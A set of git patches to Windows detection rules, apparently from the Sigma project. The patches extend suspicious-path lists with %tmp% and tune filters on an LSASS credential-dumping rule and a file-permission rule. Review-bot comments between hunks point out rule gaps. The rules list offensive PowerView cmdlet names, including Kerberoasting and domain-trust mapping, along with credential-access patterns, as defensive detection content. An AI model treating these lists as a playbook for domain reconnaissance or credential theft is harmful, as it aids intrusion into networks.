From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:49:14 +0200 Subject: [PATCH 16/96] Add %tmp% env variable --- ...osh_ps_powerview_malicious_commandlets.yml | 250 +++++++++--------- ...tsadmin_download_uncommon_targetfolder.yml | 2 + ...eation_win_cmd_redirection_susp_folder.yml | 1 + ...c_creation_win_netsh_fw_add_susp_image.yml | 83 +++--- ...n_win_reg_import_from_suspicious_paths.yml | 2 + .../proc_creation_win_susp_curl_download.yml | 3 +- ...on_win_susp_invoke_webrequest_download.yml | 2 + ...oc_creation_win_susp_mofcomp_execution.yml | 3 +- .../proc_creation_win_susp_recon.yml | 5 +- .../proc_creation_win_susp_sharpview.yml | 14 +- ...ation_win_susp_target_location_shell32.yml | 2 + ...roc_creation_win_susp_wmic_proc_create.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 2 + ...egistry_set_susp_app_paths_persistence.yml | 2 + .../registry_set_susp_run_key_img_folder.yml | 16 +- 15 files changed, 207 insertions(+), 183 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml 
@@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - 
Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - 
Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + - Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high 
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..dada69bd7 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -19,6 +19,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml 
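Review bot: The `proc_creation_win_cmd_redirection_susp_folder.yml` hunk adds `' > %TMP%\'` without a `modified:` bump, whereas the other rules touched by this commit gain `modified: 2022/09/13` (the diffstat shows a single insertion for this file). Add `modified: 2022/09/13` after its `date:` line, which sits outside the hunk. Both the new entry and the existing `' > %TEMP%\'` only match the single-`>` form with one space on each side, so append redirections into the same folder are not covered; if that is intended a short comment would help, otherwise `' >> %TEMP%\'` and `' >> %TMP%\'` could be listed alongside.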
@@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 
'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index aa0568d75..1182bd8b4 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import date: 2022/08/01 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -20,6 +21,7 @@ detection: CommandLine|contains: - 'C:\Users\' - '%temp%' + - '%tmp%' - '%appdata%' - '\AppData\Local\Temp\' - 'C:\Windows\Temp\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 7815daee9..5ca802523 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/07/28 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' selection_susp_extensions: 
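Review bot: In the `proc_creation_win_netsh_fw_add_susp_image.yml` hunk the `CommandLine|startswith` branch of `susp_image` looks unreachable: every match also requires `Image|endswith: '\netsh.exe'`, and in ordinary invocations the command line begins with the netsh binary itself, never with `C:\Windows\Tasks\` or `%Public%\`. Those paths are presumably meant to match the `program=` / `allowedprogram` argument, which `- CommandLine|contains:` would do; that one-word change (or folding the nine entries into the `contains` list above it) makes the branch live. The `condition: (1 of selection*) and susp_image` rewrite and the added `'%TMP%'` entry are fine as they stand.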
diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index be17123fc..cddb6c356 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -9,6 +9,7 @@ author: Nasreddine Bencherchali references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ date: 2022/08/02 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +35,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' - 'C:\Windows\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index 07b7eb8f6..8d625c51f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -11,7 +11,7 @@ references: - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp date: 2022/07/12 -modified: 2022/07/14 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -31,6 +31,7 @@ detection: - '\Users\Public\' - '\WINDOWS\Temp\' - '%temp%' + - '%tmp%' - '%appdata%' condition: all of selection_* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml index 7af331728..5e97ea32b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml 
@@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7 status: experimental author: frack113 date: 2021/07/30 +modified: 2022/09/13 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md @@ -24,7 +25,9 @@ detection: - 'DOSKEY.EXE' - 'sc.exe' selection_redirect: - ParentCommandLine|contains: ' > %TEMP%\' + ParentCommandLine|contains: + - ' > %TEMP%\' + - ' > %TMP%\' condition: all of selection* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..daae592e1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -1,4 +1,4 @@ -title: Suspicious Execution of SharpView Aka PowerView +title: Suspicious Execution of SharpView Aka PowerView id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d status: experimental description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems @@ -8,14 +8,15 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - sharpview: - OriginalFileName: SharpView.exe - sharpview_methods: - Commandline|contains: + selection: + - OriginalFileName: SharpView.exe + - Image|endswith: '\SharpView.exe' + - Commandline|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping 
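Review bot: The restructured `selection` in `proc_creation_win_susp_sharpview.yml` keeps the field name `Commandline|contains`; the process_creation field is `CommandLine`, and backends generally map Sigma field names case-sensitively, so the whole list of SharpView method names is likely never evaluated and only the `OriginalFileName` and `Image` entries can fire. Change it to `- CommandLine|contains:`; the `- Invoke-Sharefinder` entry added in the `@@ -142,7 +143,8 @@` hunk of the same file hangs under this field as well. The method list continues past the end of this hunk.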
@@ -142,7 +143,8 @@ detection: - Get-DomainPolicy - Get-DomainGPOLocalGroup - Get-NetGPOGroup - condition: sharpview or sharpview_methods + - Invoke-Sharefinder + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index a7895ad42..95a4a857c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -10,6 +10,7 @@ tags: - attack.t1218.011 author: Christian Burkard date: 2021/11/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -23,6 +24,7 @@ detection: - '%AppData%' - '%LocalAppData%' - '%Temp%' + - '%tmp%' - '\AppData\' - '\Temp\' - '\Users\Public\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 999d77e14..7eba3a23c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker date: 2020/10/12 -modified: 2022/08/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +34,7 @@ detection: - '\Windows\Temp\' - '\AppData\Local\' - '%temp%' + - '%tmp%' - '%ProgramData%' - '%appdata%' - '%comspec%' diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 
--- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml 
@@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' @@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 From 264bc0787d6a0ecd8f81e3f3a2b8580a9f5288e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 11:30:27 +0200 Subject: [PATCH 17/96] fix: FP with Malwarebytes --- .../proc_access_win_cred_dump_lsass_access.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml 
@@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' From 3b4fc8c3fdf809062a19249d8531a16137d97d63 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 13 Sep 2022 16:02:17 +0500 Subject: [PATCH 18/96] VS Code Filter Fix - Undo the last commit Previous Filter of Image was wrong. Image can't endsWith (Code.exe and attrib.exe) at the same time. Same condition with other scenario. CommandLine filter is good. --- .../proc_creation_win_file_permission_modifications.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml index 32e4c6c75..f29b6b107 100644 --- a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml +++ b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml 
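Review bot: The new `filter_malwarebytes` entry in `proc_access_win_cred_dump_lsass_access.yml` exempts LSASS access on an exact `SourceImage` path under `C:\PROGRAMDATA`, a tree that is not protected the way `Program Files` is, and the hunk shows nothing beyond path and access mask to corroborate the process. Keeping `GrantedAccess: '0x1410'` in the filter is the right way to stay narrow; add a comment so the reason survives, e.g. `# FP: Malwarebytes updater (commit "fix: FP with Malwarebytes") - keep the access-mask constraint`. The `detection` block continues outside the hunk.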
@@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11) date: 2019/10/23 -modified: 2022/09/03 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -30,8 +30,7 @@ detection: - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - 'S-1-5-19:F' filter_programs: - - Image|contains: '\AppData\Local\Programs\Microsoft VS Code' - - Image|endswith: '\Microsoft VS Code\Code.exe' + CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' condition: 1 of selection* and not 1 of filter* fields: - ComputerName From 67bca9674440b54436d015c6cccb754d4f9c96bd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:13:16 +0200 Subject: [PATCH 19/96] fix: wrong image selection --- .../proc_creation_win_file_permission_modifications.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml index f29b6b107..5a21b2149 100644 --- a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml +++ b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml @@ -30,7 +30,8 @@ detection: - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - 'S-1-5-19:F' filter_programs: - CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' + - CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' + - ParentImage|endswith: '\Microsoft VS Code\Code.exe' condition: 1 of selection* and not 1 of filter* fields: - ComputerName From 2ed0605dc41ec0ba7e6b3e0619894b686ee01a1e Mon Sep 17 00:00:00 2001 
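Review bot: In the PATCH 19 hunk of `proc_creation_win_file_permission_modifications.yml`, `filter_programs` is now a list, so either `CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code'` or `ParentImage|endswith: '\Microsoft VS Code\Code.exe'` alone suppresses the alert; the command-line branch exempts any permission-change call whose arguments merely mention the VS Code folder, whatever its parent. If that breadth is intended, record the legitimate behaviour it covers in a comment, e.g. `# legitimate VS Code install/update activity on its own folder - confirm`, so it is not tightened later by mistake. The selections referenced by `1 of selection*` start outside the hunk.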
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 13 Sep 2022 15:52:07 +0200 Subject: [PATCH 20/96] Revert "Revert "Merge branch 'master' of github.com:elhoim/sigma"" This reverts commit 6c1761a7b742cd7fcbde5dc2cfd92db6ebefe062. --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From fb44c6fa8709d116de3c25be623704a12375e1c0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:14:45 +0200 